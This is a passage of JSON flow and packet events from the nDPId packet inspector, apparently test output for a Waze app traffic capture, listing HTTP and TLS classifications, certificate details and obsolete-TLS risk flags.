-00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1435587872702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872702,"pkt":"ABoRAAACABoRAAABCABFAAA8Y6lAAEAGsncKCAABNubjrLHyAFAC8Q4\/AAAAAKAC\/\/\/yUgAAAgQFtAQCCAoACG2WAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1435587872704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872704,"pkt":"ABoRAAACABoRAAABCABFAAAodMpAABAG0Wo25uOsCggAAQBQsfL9DvHAAvEOQFAS\/\/\/Y8wAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872705,"pkt":"ABoRAAACABoRAAABCABFAAAoY6pAAEAGsooKCAABNubjrLHyAFAC8Q5A\/Q7xwVAQ\/\/\/Y9AAA"} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872702,"flow_last_seen":1435587872706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/lang.conf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871929,"flow_last_seen":1435587873486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587873486,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":249,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871935,"flow_last_seen":1435587873688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873688,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -01242{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587871929,"flow_last_seen":1435587873741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1435587873741,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 
-01243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587871918,"flow_last_seen":1435587874033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1435587874033,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
-01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
-01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 